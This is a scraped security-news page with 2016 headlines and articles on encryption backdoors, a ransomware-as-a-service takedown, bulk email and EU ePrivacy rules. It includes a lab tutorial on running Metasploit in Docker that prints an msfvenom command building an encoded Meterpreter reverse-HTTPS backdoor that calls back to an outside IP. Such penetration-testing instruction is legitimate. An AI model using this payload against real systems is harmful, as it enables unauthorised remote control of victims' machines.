
Dyn Confirms DDoS Attack Affecting Twitter, Github, Many Others

October 21, 2016 , 10:01 am

IoT Botnets Are The New Normal of DDoS Attacks

October 5, 2016 , 8:51 am

Leftover Factory Debugger Doubles as Android Backdoor

October 14, 2016 , 9:00 am

iPhone Call History Synced to iCloud Without User Consent, Knowledge

November 17, 2016 , 1:51 pm

Cryptsetup Vulnerability Grants Root Shell Access on Some Linux Systems

November 15, 2016 , 3:28 pm

Microsoft Patches Zero Day Disclosed by Google

November 8, 2016 , 2:57 pm

Microsoft Says Russian APT Group Behind Zero-Day Attacks

November 1, 2016 , 5:50 pm

Google to Make Certificate Transparency Mandatory By 2017

October 29, 2016 , 6:00 am

Microsoft Extends Malicious Macro Protection to Office 2013

October 27, 2016 , 4:27 pm

Dyn DDoS Work of Script Kiddies, Not Politically Motivated Hackers

October 25, 2016 , 3:00 pm

Mirai-Fueled IoT Botnet Behind DDoS Attacks on DNS Providers

October 22, 2016 , 6:00 am

FruityArmor APT Group Used Recently Patched Windows Zero Day

October 20, 2016 , 7:00 am

Experts ‘Outraged’ by Warrant Demanding Fingerprints to Unlock Smartphones

October 18, 2016 , 4:58 pm

Researchers Break MarsJoke Ransomware Encryption

October 3, 2016 , 5:00 am

OpenSSL Fixes Critical Bug Introduced by Latest Update

September 26, 2016 , 10:45 am

500 Million Yahoo Accounts Stolen By State-Sponsored Hackers

September 22, 2016 , 3:47 pm

Yahoo Reportedly to Confirm Breach of Hundreds of Millions of Credentials

September 22, 2016 , 12:31 pm

Experts Want Transparency From Government’s Vulnerabilities Equities Process

September 20, 2016 , 2:41 pm

Bruce Schneier on Probing Attacks Testing Core Internet Infrastructure

September 15, 2016 , 11:15 am

Generic OS X Malware Detection Method Explained

September 13, 2016 , 9:14 am

Patched Android Libutils Vulnerability Harkens Back to Stagefright

September 9, 2016 , 2:06 pm

Chrome to Label Some HTTP Sites ‘Not Secure’ in 2017

September 8, 2016 , 3:43 pm

Threatpost News Wrap, September 2, 2016

September 2, 2016 , 9:00 am

Insecure Redis Instances at Core of Attacks Against Linux Servers

September 1, 2016 , 1:08 pm

Dropbox Forces Password Reset for Older Users

August 29, 2016 , 9:58 am

Cisco Begins Patching Equation Group ASA Zero Day

August 24, 2016 , 5:53 pm

New Collision Attacks Against 3DES, Blowfish Allow for Cookie Decryption

August 24, 2016 , 8:00 am

Cisco Acknowledges ASA Zero Day Exposed by ShadowBrokers

August 17, 2016 , 4:06 pm

Pokémon GO Spam, Ransomware, On the Rise

August 17, 2016 , 12:58 pm

ProjectSauron APT On Par With Equation, Flame, Duqu

August 8, 2016 , 1:40 pm

Miller, Valasek Deliver Final Car Hacking Talk

August 4, 2016 , 3:26 pm

Researchers Go Inside a Business Email Compromise Scam

August 4, 2016 , 10:00 am

Export-Grade Crypto Patching Improves

August 3, 2016 , 10:00 am

Kaspersky Lab Launches Bug Bounty Program

August 2, 2016 , 9:00 am

Threatpost News Wrap, July 29, 2016

July 29, 2016 , 10:45 am

KeySniffer Vulnerability Opens Wireless Keyboards to Snooping

July 26, 2016 , 9:30 am

Upcoming Tor Design Battles Hidden Services Snooping

July 25, 2016 , 3:51 pm

EFF Files Lawsuit Challenging DMCA’s Restrictions on Security Researchers

July 21, 2016 , 1:18 pm

Oracle Patches Record 276 Vulnerabilities with July Critical Patch Update

July 20, 2016 , 9:21 am

Threatpost News Wrap, July 15, 2016

July 15, 2016 , 11:00 am

Academics Build Early-Warning Ransomware Detection System

July 14, 2016 , 1:05 pm

xDedic Hacked Server Market Resurfaces on Tor Domain

July 12, 2016 , 11:40 am

Conficker Used in New Wave of Hospital IoT Device Attacks

June 30, 2016 , 11:48 am

655,000 Healthcare Records Being Sold on Dark Web

June 28, 2016 , 10:00 am

Windows Zero Day Selling for $90,000

May 31, 2016 , 5:44 pm

Millions of Stolen MySpace, Tumblr Credentials Being Sold Online

May 31, 2016 , 1:37 pm

OTR Protocol Patched Against Remote Code Execution Flaw

March 10, 2016 , 10:23 am

Facebook Debuts Open Source Detection Tool for Windows

September 27, 2016 , 12:24 pm

Serious Dirty Cow Linux Vulnerability Under Attack

October 21, 2016 , 11:21 am

Popular Android App Leaks Microsoft Exchange User Credentials

October 14, 2016 , 8:00 am

Cisco Warns of Critical Flaws in Nexus Switches

October 7, 2016 , 10:55 am

Free Tool Protects Mac Users from Webcam Surveillance

October 7, 2016 , 7:00 am


Threatpost | The first stop for security news

Apple may have refused to help the FBI unlock an iPhone used by the San Bernardino shooter, but the tech industry is still better off working with the U.S. government on encryption issues than turning away, according to a former official with the Obama administration.

“The government can get very creative,” said Daniel Rosenthal, who served as the counterterrorism director in the White House until January this year. He fears that the U.S. government will choose to “go it alone” and take extreme approaches to circumventing encryption, especially if another terrorist attack occurs.


“The solutions they come up with are going to be less privacy protective,” he said during a talk at the Versus 16 cybersecurity conference. “People will think they are horrifying, and I don’t want us to see us get to that place.”

Rosenthal made his comments as President-elect Donald Trump—who previously called for a boycott of Apple during its dispute with the FBI—prepares to take office in January.

A Trump administration has a “greater likelihood” than the Obama administration of supporting legislation that will force tech companies to break into their customers’ encrypted data when ordered by a judge, Rosenthal said.

“You have a commander-in-chief, who said at least on the campaign trail he’s more favorable towards a backdoor regime,” Rosenthal said.

Earlier this year, one such bill was proposed that met with staunch opposition from privacy advocates. However, in the aftermath of another terrorist attack, Congress might choose to push aside those concerns and pass legislation drafted without the advice of Silicon Valley, he said.  

Rosenthal went on to say that U.S. law enforcement needs surveillance tools to learn about terrorist plots, and that’s where the tech industry can help. During his time in the White House, he noticed a “dramatic increase” in bad actors using encryption to thwart government efforts to spy on them.

“There are people trying to come up with a reasonable solution,” he said of efforts to find a middle ground on the encryption debate. “To immediately say there is no solution is counter historical.”

Michael Kan

Cindy Cohn (right), executive director of EFF, and Daniel Rosenthal, former director of counterterrorism for the White House.

However, Rosenthal’s comments were met with resistance from Cindy Cohn, executive director for Electronic Frontier Foundation, a privacy advocate. She also spoke at the talk and opposed government efforts to weaken encryption, saying it “dumbs down” security.

“This idea of a middle ground that you can come up with an encryption strategy that only lets good guy into your data, and never lets a bad guy into your data, misunderstands how the math works,” she said.

Law enforcement already possesses a wide variety of surveillance tools to track terrorists, she said. In addition, tech companies continue to help U.S. authorities on criminal cases and national security issues, despite past disputes over privacy and encryption.

But law enforcement has done little to recognize the risks of building backdoors into products, Cohn said. Not only would this weaken security for users, but it would also damage U.S. business interests.

“If American companies can’t offer strong encryption, foreign companies are going to walk right into that market opportunity,” she said.

Cohn also said any effort to force U.S. companies to weaken encryption wouldn’t necessarily help catch terrorists. That’s because other strong encryption products from foreign vendors are also circulating across the world.

“The idea that the Americans can make sure that ISIS never gets access to strong encryption is a pipe dream,” she said. “That’s why I think this is bad idea. Because I don’t think it’s going to work.”

The Versus 16 conference was sponsored by cybersecurity firm Vera. 



InfoWorld Security

Security researchers earlier this year managed to zero in on the Encryptor Ransomware-as-a-Service (RaaS), which forced the developer to shut down the operation, but without releasing the master key to help victims.

The ransomware service first emerged in July 2015 as a multiplatform threat at an appealing price, and quickly became a considerable threat to users and businesses, Trend Micro researchers reveal. Attacks leveraging this piece of ransomware could be easily tailored by affiliates, and the Encryptor RaaS author created a full web panel for his patrons, which could be accessed only via the Tor network.

As with other ransomware, Bitcoin was the preferred transaction currency, and the earnings looked highly appealing for affiliates, as they had to share only 5% of their revenue with the author. Other similar services out there, such as Cerber, would require affiliates to pay 40% in commissions, Trend Micro explains (the Cerber campaigns generate an estimated $2.3 million in annual revenue).

Encryptor RaaS was being advertised in surface web and darknet forums and interested parties only needed to contact the developer to show interest. Technical expertise wasn’t a requirement, though affiliates needed to know how to set up a Bitcoin Wallet ID, which would be attached to the distributed ransomware variant. Affiliates were also provided with a “customer ID” and could choose the ransom amount and the distribution method.

The malware was written purely in C, used a combination of the RC6 and RSA-2048 algorithms to encrypt 231 file types, generated an ID for each victim, and had its entire infrastructure hidden within the Tor network. Victims were instructed to use Tor2Web or the Tor Browser to access the payment site and could also use a chat box to contact the cybercriminals.

The ransomware’s author focused on avoiding detection and even started offering a file-signing service for affiliates, saying that he had access to stolen Authenticodes. Encryptor RaaS was improved to become virtually undetectable, being able to trick static engine analysis, but still being caught by behavioral detection.

While analyzing the threat, researchers discovered that the actor left a command and control (C&C) server either abandoned or mistakenly open: it was exposed and not anonymized by Tor. Thus, researchers determined that Encryptor RaaS was being hosted on a legitimate cloud service, and one of the RaaS’s systems was seized in June.

The operator immediately took the infrastructure down as a precautionary measure, but more servers were seized a few days later. However, the developer managed to bring the entire system back online after four days, and also announced that it would shut down the operation. A shutdown notice was posted on all the main pages of decryptor sites, and Encryptor RaaS’s main site.

“Encryptor RaaS’s systems went down around 5 PM GMT on July 5, 2016, with the developer leaving victims a message that they can no longer recover their files, as he deleted the master key,” Trend Micro reveals. Thus, while there’s one less ransomware family to worry about, there are users left without the possibility of recovering their files.


Ionut Arghire is an international correspondent for SecurityWeek.



SecurityWeek RSS Feed

Email is one of the most efficient ways to keep in touch with your existing or prospective customers. But only if you use it properly.

Has this ever happened to you: your phone rings, and it’s one of your executives screaming because a mail he or she sent to a customer bounced back with a Non-Delivery Report, the dreaded NDR? Just as you hang up your phone rings again about another NDR, and your cell phone beeps a text message from your monitoring system notifying that your outbound mail queue is starting to back up, and before you know it you’ve got a full-fledged disaster on your hands because no email is getting out. You do some digging and find out pretty quickly – you’ve been blacklisted. So what happened?

Well, if this were the mid-90s, I’d say you had an open relay on your hands, and got added to one or more of the blacklists that track those things. But you know better than that, and so that leaves your marketing department. Maybe they set up a script using blat to crank out thousands of emails to a mailing list they found/created. Or perhaps they purchased an application and are running it on their desktop to do similar things. Or they could have simply started cranking out bulk volumes of email with Word and Outlook because you don’t have restrictions on send rates.

Whatever the reason, the road to heck is paved with good intentions, and when someone tries to do IT without IT’s involvement, bad things can happen. You get the mess cleaned up, finally figure out how to get yourself delisted, and speak harshly to the marketing team about never doing it again. That’s when they look at you and say “But we have to send out these emails. How do we do it?”

Commercial remailer services are the way to go here. There are several on the market that offer remailing services to send out newsletters, advertising, notifications, or pretty much any other bulk emailing need you may have, and there are multiple advantages to using these.

Bulk emailing uses a lot of bandwidth, especially when attachments are included. It can use even more with replies, NDRs, unsubscribe requests, and more. If a third-party service is sending email for you, then they are using their bandwidth and can deal with all the responses, provided that you are using a subdomain instead of your primary domain. In other words, if you are @example.com, ensure that mail is sent by [email protected] and either delegate that domain to them for management, or ensure your MX for that domain resolves to their systems, not yours.

You will still find some recipients that will blacklist the sending system. When that is a subdomain instead of your primary domain, and the IPs blocked are the third-party mailer’s and not yours, the legitimate mail being sent by your users does not get blocked along with it.

Anyone sending bulk email needs to have an unsubscribe method and honor requests for removal. That can be a lot of work, so third party mailing services have this down to a science, with automatic processing. That’s much easier than doing it by hand, can be done instantly, and will go a long way to keeping your customers’ good will towards you.

What do you need to do in order to start using a third party service? There is a great blog post over at Zapier.com titled Transactional Email: The 7 Best Services to Send 1000s of Emails Daily that lists, well, the seven best services to send bulk email.

Check out that list for links to the top services, and keep in mind there are others out there too that you may want to investigate. Keep the costs in mind and speak to your colleagues from marketing, but also keep your eye out on the following features:

  • Will they send from a subdomain?
  • Will they manage DNS for that subdomain, or let you, as you prefer?
  • Do they support DKIM and DMARC?
  • Do they handle replies as well?

You want to minimize the likelihood that your business email system is going to suffer any backlash from sending outbound mails in volume through a service, and you also want to ensure that the mails, while bulk, do adhere to best practices for bulk email, and that you map them into your SPF or other DNS records so that they are not flagged for spoofing.
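The checklist above can be turned into a repeatable audit of the bulk-mail subdomain's DNS records. The following is an added example, not code from the original post: the subdomain `news.example.com`, the provider `bulkmailer.example`, its SPF include name and the DKIM selector `s1` are all assumptions, and the records are constructed sample data rather than live lookups.

```python
"""Audit the DNS records of a bulk-mail subdomain (constructed data, no network)."""

def tags(record):
    """Parse the 'k=v; k=v' tag list used by DMARC and DKIM TXT records."""
    out = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            out[key.strip().lower()] = value.strip()
    return out

def under(host, domain):
    """True if host is domain or a name below it (match on a label boundary)."""
    host, domain = host.lower().rstrip("."), domain.lower().rstrip(".")
    return host == domain or host.endswith("." + domain)

def audit(zone, sub, provider, spf_include, selector):
    """Return a list of findings; an empty list means every check passed."""
    findings = []

    # Replies, NDRs and unsubscribe mail must go to the provider, not to you.
    mx_hosts = [r.split()[-1] for r in zone.get((sub, "MX"), [])]
    if not mx_hosts:
        findings.append(f"no MX for {sub}")
    for host in mx_hosts:
        if not under(host, provider):
            findings.append(f"MX {host} is not a {provider} host")

    # SPF: exactly one record, authorising the provider, ending in a fail policy.
    spf = [r for r in zone.get((sub, "TXT"), [])
           if r.lower().split()[:1] == ["v=spf1"]]
    if len(spf) != 1:
        findings.append(f"expected exactly one SPF record at {sub}, found {len(spf)}")
    else:
        terms = spf[0].lower().split()[1:]
        if f"include:{spf_include}" not in terms:
            findings.append(f"SPF does not include {spf_include}")
        if not terms or terms[-1] not in ("-all", "~all"):
            findings.append("SPF does not end in -all or ~all")

    # DMARC: one record with a valid policy at _dmarc.<subdomain>.
    dmarc = [tags(r) for r in zone.get(("_dmarc." + sub, "TXT"), [])]
    dmarc = [t for t in dmarc if t.get("v", "").upper() == "DMARC1"]
    if len(dmarc) != 1:
        findings.append(f"expected exactly one DMARC record at _dmarc.{sub}, "
                        f"found {len(dmarc)}")
    elif dmarc[0].get("p", "").lower() not in ("none", "quarantine", "reject"):
        findings.append("DMARC record has no valid p= policy")

    # DKIM: the selector must publish a key; an empty p= means the key is revoked.
    dkim = [tags(r) for r in zone.get((f"{selector}._domainkey.{sub}", "TXT"), [])]
    if not any(t.get("p") for t in dkim):
        findings.append(f"no usable DKIM key at {selector}._domainkey.{sub}")
    return findings

# Assumed names, for illustration only.
SUB, PROVIDER = "news.example.com", "bulkmailer.example"
SPF_INCLUDE, SELECTOR = "spf.bulkmailer.example", "s1"

# Constructed sample zone: the subdomain is fully handed over to the provider.
GOOD_ZONE = {
    (SUB, "MX"): ["10 mx1.bulkmailer.example."],
    (SUB, "TXT"): ["v=spf1 include:spf.bulkmailer.example -all"],
    ("_dmarc." + SUB, "TXT"): ["v=DMARC1; p=quarantine; rua=mailto:dmarc@example.com"],
    ("s1._domainkey." + SUB, "TXT"): ["v=DKIM1; k=rsa; p=PLACEHOLDERBASE64KEY"],
}

# Constructed sample zone: MX still points at the corporate mail host,
# SPF allows any sender, DMARC is missing and the DKIM key is empty.
BAD_ZONE = {
    (SUB, "MX"): ["10 mail.example.com."],
    (SUB, "TXT"): ["v=spf1 include:spf.bulkmailer.example +all"],
    ("s1._domainkey." + SUB, "TXT"): ["v=DKIM1; k=rsa; p="],
}

if __name__ == "__main__":
    for name, zone in (("good", GOOD_ZONE), ("bad", BAD_ZONE)):
        print(name, audit(zone, SUB, PROVIDER, SPF_INCLUDE, SELECTOR))
```

To run it against real records, fill the zone dictionary from the output of your resolver of choice.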

So if you have a need for sending bulk email, check out one of the services listed in the post linked above, and ensure you set things up on your end as well. That way, marketing can do what they need, you don’t get angry phone calls, and your company email keeps flowing.



GFI Blog

Microsoft researchers have devised a way for third parties to make use of the vast amount of encrypted data stored in the cloud by companies and individuals, without them actually having access to it or learning anything about it (except for what can be deduced from the result).

The solution involves a protocol for a Secure Data Exchange (SDE) that uses Secure Multi-Party Computation (MPC), and which removes the need for the third party to decrypt (and, therefore, be able to peek into) the data before it is used in computations.

The owner of the data gives the keys to it to the buyer (or keys to part of it to the potential buyer) and the buyer uses them to decrypt the data inside a multiparty computation.

“All of the computation is performed in the cloud, and the computation itself is encrypted in such a way that not even the cloud knows what is being computed, which protects any of the buyer’s data used in the computation such as a proprietary algorithm. If everything goes as expected, the cloud reveals the decrypted results to the interested parties,” Microsoft’s John Roach explains.

In the paper describing the solution, the researchers offered several real-world business scenarios where a secure data exchange using their protocol can come in handy.

For example: A company that’s developing machine learning models that will assist primary care providers in choosing the best treatment plans for their patients needs data to develop and study their models. They want to buy anonymized patient medical records from hospitals to do that, but only if the data does not already fit the model.

“This could in theory be tested by running simple statistical tests comparing the model parameters with the data, but in practice not because the hospital is not willing to disclose its data before a deal has been made,” the researchers explained.

A secure data exchange of this kind can also provide a way for the buyer to try out a fragment of this data, so that he can make an informed decision about whether it will be worth buying the entirety of the data.

The researchers’ solution is still in the concept phase but, according to Roach, they are planning to create – and publicly release – the tools that will allow the creation of secure data exchanges in the not-so-distant future.


Help Net Security

Metasploit Framework is a powerful open source tool for penetration testing. Whether you’re looking to use it for work or are merely interested in experimenting with it, you can run Metasploit Framework in a Docker container without having to deal with the pain of installing the code and its dependencies. The Docker image “remnux/metasploit” is available as part of the REMnux collection, thanks to the configuration efforts of Jean Christophe Baptiste.

The following instructions and examples demonstrate how you can start using this Metasploit Docker container in a lab as well as on a publicly-accessible server. The container provides the command-line Metasploit Framework version of the tool. It lacks the web-based interface that you can get if you install the free Community edition, which you would need to register with Rapid7. Command-line capabilities of Metasploit Framework are very powerful and lend themselves well to penetration testing tasks that involve running the tool on a remote system.

How to Launch the Metasploit Framework Docker Container

To make use of the Metasploit Framework Docker image, all you need is a sufficiently-powerful system that is connected to the Internet and that has Docker installed on it. When you run a command like the one below on such a host, it will automatically download the image from the REMnux repository and launch it:

 sudo docker run --rm -it -p 443:443 -v ~/.msf4:/root/.msf4 -v /tmp/msf:/tmp/data remnux/metasploit 

In this example, I directed Docker to run the application “remnux/metasploit” in a transient container, which will disappear once you’ve exited it (that’s what “--rm” is for). The “-it” parameter allows you to interact with the container using an interactive shell.

To ensure that relevant data persists across container invocations, I used the “-v” parameter to map the directories on my host to the corresponding locations inside the container. The idea is to use the “~/.msf4” directory for Metasploit Framework configuration files. The “/tmp/msf” directory on the host can store other data you may wish to keep, such as the artifacts you might obtain from the targeted systems.

The “-p” parameter maps the ports on which you expect to receive inbound connections to the corresponding ports inside the container. The example above uses TCP port 443 with the expectation of incoming HTTPS connections from reverse shells.

The image is quite large: over 1.2GB in size, because it includes the full runtime environment for Metasploit Framework, along with all its dependencies. It will be cached locally after the initial download. If you ever wish to refresh the image to ensure you’re using the latest version, use the command “sudo docker pull remnux/metasploit”.

The container is configured to automatically update Metasploit modules whenever you launch it. To add your own modules, add them to your host’s ~/.msf4 directory.
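The two “-v” host directories hold configuration and data collected during a test, and /tmp is writable by every local user, so on a shared host it is worth creating them privately before they are mounted. The following is an added example, not part of the original article or the REMnux project; the helper names are hypothetical, and it rebuilds the same “docker run” arguments shown above.

```python
import os
import stat

IMAGE = "remnux/metasploit"  # image name from the article


def prepare_volume_dir(path):
    """Create `path` as a private (0700) directory, or verify an existing one.

    Refuses symlinks and directories owned by another user, which another
    local account could have planted at a predictable path such as /tmp/msf.
    """
    path = os.path.expanduser(path)
    try:
        os.mkdir(path, 0o700)
    except FileExistsError:
        pass  # something is already there; it is inspected below
    st = os.lstat(path)  # lstat does not follow a symlink at this path
    if stat.S_ISLNK(st.st_mode):
        raise ValueError(f"{path} is a symlink; refusing to mount it")
    if not stat.S_ISDIR(st.st_mode):
        raise ValueError(f"{path} exists but is not a directory")
    if st.st_uid != os.getuid():
        raise ValueError(f"{path} is owned by uid {st.st_uid}, not the current user")
    if stat.S_IMODE(st.st_mode) != 0o700:
        os.chmod(path, 0o700)  # drop group/other access on our own directory
    return path


def docker_run_argv(config_dir="~/.msf4", data_dir="/tmp/msf", port=443):
    """Return the article's docker run command as an argument list."""
    config_dir = prepare_volume_dir(config_dir)
    data_dir = prepare_volume_dir(data_dir)
    return [
        "docker", "run", "--rm", "-it",
        "-p", f"{port}:{port}",
        "-v", f"{config_dir}:/root/.msf4",
        "-v", f"{data_dir}:/tmp/data",
        IMAGE,
    ]


if __name__ == "__main__":
    # Prints the command instead of running it, so it can be reviewed first.
    print(" ".join(docker_run_argv()))
```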

Test-Driving the Metasploit Framework Container

Here’s how you might start experimenting with Metasploit Framework after launching its “remnux/metasploit” container in your lab. I’ll target a weakly-configured Windows system in my lab for example purposes. I’ll direct Metasploit Framework to remotely connect to the system using the credentials that I supplied, rather than actually exploiting a vulnerability. I will then open a reverse HTTPS shell to my Metasploit Framework console.

In the sample session above, I launched Metasploit’s msfconsole tool, then directed it to give me an interactive Meterpreter shell to the targeted system. The connection was tunneled over HTTPS, which was directed to the Metasploit Framework container over TCP port 443.

The screenshot that I saved using this session was placed in the /tmp/data directory inside the container. When I exited the container, the contents of that directory persisted on my underlying host in the /tmp/msf directory.

Running the Metasploit Framework Container in the Public Cloud

When performing penetration testing, you’ll probably want to run Metasploit on an Internet-accessible system. You can do this quite easily by bringing up a temporary server within some public cloud provider, then running the Metasploit Framework container on that host.

For instance, here is how you can accomplish this using DigitalOcean, which I like to use due to its low cost and high reliability. (The link includes my referral code.) Though DigitalOcean can spin up virtual machines for merely $5 per month, I found such a low-end system to have insufficient RAM for Metasploit. Therefore, I went with the $10 per month option for an Ubuntu host.

Once the new system is active, you can log into it and execute the following commands to install Docker on the host:

 apt-key adv --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys 58118E89F3A912897C070ADBF76221572C52609D
 add-apt-repository -y "deb https://apt.dockerproject.org/repo ubuntu-$(lsb_release -sc) main"
 apt-get update
 apt-get -y dist-upgrade
 apt-get -y install docker-engine

Afterwards, you can direct Docker to download and launch the Metasploit Framework container using a command like the one in the beginning of this article.

 sudo docker run --rm -it -p 443:443 -v ~/.msf4:/root/.msf4 -v /tmp/msf:/tmp/data remnux/metasploit 

For this example, I decided to use Metasploit to generate a standalone backdoor executable file, which I would run on the targeted Windows system to simulate a scenario where the victim is tricked into running malware. I ran the “msfvenom” tool inside the Metasploit Framework container to accomplish this:

 msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_https LHOST=104.236.213.164 LPORT=443 -e x86/shikata_ga_nai -f exe -o file.exe 

Since the current directory inside the container is /tmp/data by default, the resulting file was placed there. Because I mapped this directory to the host’s /tmp/msf directory, I was able to take it from there and transfer it to my lab’s Windows computer.

I then ran “msfconsole” inside the container and directed the tool to use multi/handler, which is designed to accept connections generated outside of the “msfconsole” interface. Once the reverse-HTTPS listener was active, I “infected” my Windows system with the previously-created file.exe, which completed the connection and provided me with a Meterpreter shell.

As was the case in the previous example, I saved the screenshot of the Windows system into /tmp/data, which allowed me to retain it even after the container terminated.

Additional Capabilities of the Container

The Metasploit Framework container also includes the infamous Nmap scanning tool, which you can run using the “nmap” command. It offers a powerful way to examine networks and systems to locate potentially-vulnerable services and to determine where to focus your Metasploit efforts. The container also includes the NASM disassembler.

In addition, the container includes the tmux terminal multiplexer utility. It allows you to launch multiple “virtual” windows inside a single terminal window. The container’s configuration for this tool maps Ctrl+a as the command key, instead of the default Ctrl+b. To make use of it, type “tmux” after launching the Metasploit Framework container. This will give you a shell inside one of the tool’s “virtual” windows. To open another one, press Ctrl+a followed by “c”. To switch between the windows, type Ctrl+a followed by that window’s number (e.g., Ctrl+a followed by “0” or “1”).

For example, you could use tmux to run nmap in one window and msfconsole in another. You can read a tutorial on using tmux to get started with this tool.

Wrapping It Up

Docker containers offer a convenient way of running Metasploit Framework without having to deal with the installation of the tool’s code and its dependencies. Running Metasploit this way is especially handy for situations where you wish to quickly deploy it to a new system, such as one running in a public cloud, and then tear it down without losing your customizations or data. On the other hand, this approach requires some familiarity with Docker containers.

Thanks to Jean Christophe Baptiste for creating and maintaining the Dockerfile and associated configuration files upon which the “remnux/metasploit” image is based. If you notice any problems with this container or have suggestions for improving it, please log an issue on the REMnux repository for Docker files.



Lenny Zeltser

“The confidentiality of online communications by individuals and businesses is essential for the functioning of modern societies and economies. The EU rules designed to protect privacy in electronic communications need to reflect the world that exists today,” European Data Protection Supervisor (EDPS) Giovanni Buttarelli opined after reviewing a new proposal on the ePrivacy Directive.

European privacy advisor wants encryption without backdoors

The existing ePrivacy Directive is currently under revision. The European Commission is collecting feedback on the proposal, and should prepare a new, updated version of the legislation by the end of 2016. One of the purposes of the EDPS is to advise EU institutions on policies and legislation that affect privacy.

In his opinion, the EDPS says that the scope of new ePrivacy rules needs to be broad enough to cover all forms of electronic communications irrespective of network or service used, not only those offered by traditional telephone companies and internet service providers. Individuals must be afforded the same level of protection for all types of communication, such as telephone, Voice over IP services, mobile phone messaging apps and Internet of Things (machine-to-machine) communications.

The updated rules should also ensure that the confidentiality of users is protected on all publicly accessible networks, including Wi-Fi services in hotels, coffee shops, shops, airports and networks offered by hospitals to patients, universities to students, and hotspots created by public administrations.

Any interference with the right to confidentiality of communications is contrary to the European Charter of Fundamental Rights.

No communications should be subject to unlawful tracking and monitoring without freely given consent, whether by cookies, device-fingerprinting, or other technological means. Users must also have user-friendly and effective mechanisms to give, or not give, their consent. In order to better protect the confidentiality and security of electronic communications, the current consent requirement for traffic and location data must be strengthened.

The existing rules in the ePrivacy Directive protecting against unsolicited communications, such as advertising or promotional messages, should be updated and strengthened and require prior consent of the recipients for all forms of unsolicited electronic communications.

The new rules should also clearly allow users to use end-to-end encryption (without “backdoors”) to protect their electronic communications. Decryption, reverse engineering or monitoring of communications protected by encryption should be prohibited.

A new provision for organisations to periodically disclose aggregate numbers indicating EU and non-EU law enforcement or government requests for information would offer some welcome transparency in the sensitive, complex and often contentious area of government access to communications.

The new rules should complement, and where necessary, specify the protections available under the General Data Protection Regulation (GDPR). They should also maintain the existing, higher level of protection in those instances where the ePrivacy Directive offers more specific safeguards than in the GDPR.


Help Net Security